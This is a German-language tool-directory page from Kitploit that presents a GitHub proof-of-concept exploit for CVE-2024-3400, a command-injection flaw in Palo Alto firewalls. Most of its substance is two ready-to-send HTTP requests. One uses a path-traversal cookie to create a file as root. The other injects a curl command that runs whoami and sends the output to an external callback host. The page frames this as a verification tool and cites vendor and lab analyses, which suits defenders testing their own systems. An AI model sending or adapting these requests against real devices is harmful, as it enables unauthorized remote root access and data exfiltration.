Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3400-poc — Proof-of-Concept-Exploit für CVE-2024-3400, eine Befehlsinjektions-Schwachstelle in Palo-Alto-Firewalls, die Dateierstellung und Remote-Befehlsausführung über manipulierte HTTP-Anfragen demonstriert. | Kitploit
Tools/GitHubGitHub/ghassansabir/cve-2024-3400-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubghassansabir/cve-2024-3400-poc

CVE-2024-3400-poc

Proof-of-Concept-Exploit für CVE-2024-3400, eine Befehlsinjektions-Schwachstelle in Palo-Alto-Firewalls, die Dateierstellung und Remote-Befehlsausführung über manipulierte HTTP-Anfragen demonstriert.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3400 Schwachstellen-PoC (Verifizierungswerkzeug)

Schwachstellenbeschreibung

CVE-2024-3400 ist eine Befehlsinjektions-Schwachstelle in Palo-Alto-Firewall-Systemen. Durch einen sorgfältig konstruierten HTTP-Request kann ein Angreifer bösartige Befehle auf dem Zielserver ausführen und sogar Root-Rechte erlangen.

Schritte zur Reproduktion der Schwachstelle

  1. Senden Sie den folgenden HTTP-Request:
root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Nach dem Senden dieses Requests wird auf dem Server eine Datei mit dem Namen hellome1337.txt erstellt, die über Root-Berechtigungen verfügt.

  1. Wenn Sie versuchen, auf diese Datei zuzugreifen, sollte der HTTP-Statuscode 403 (Verboten) zurückgegeben werden, nicht 404 (Nicht gefunden).

Der Screenshot zeigt den Effekt während des Exploit-Prozesses:

image

image

Beispiel für Befehlsinjektion

Um die Schwachstelle für eine Befehlsinjektion auszunutzen, können Sie den folgenden HTTP-Request senden:

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Dieser Request führt den Befehl whoami auf dem Server aus und sendet das Ergebnis an den angegebenen Remote-Server (z. B.: xxxxxxxxxxxxxxxxx.oast.fun).

Weiterführende Lektüre

  • Rapid7-Analyse
  • WatchTowr-Laboranalyse
Tool herunterladen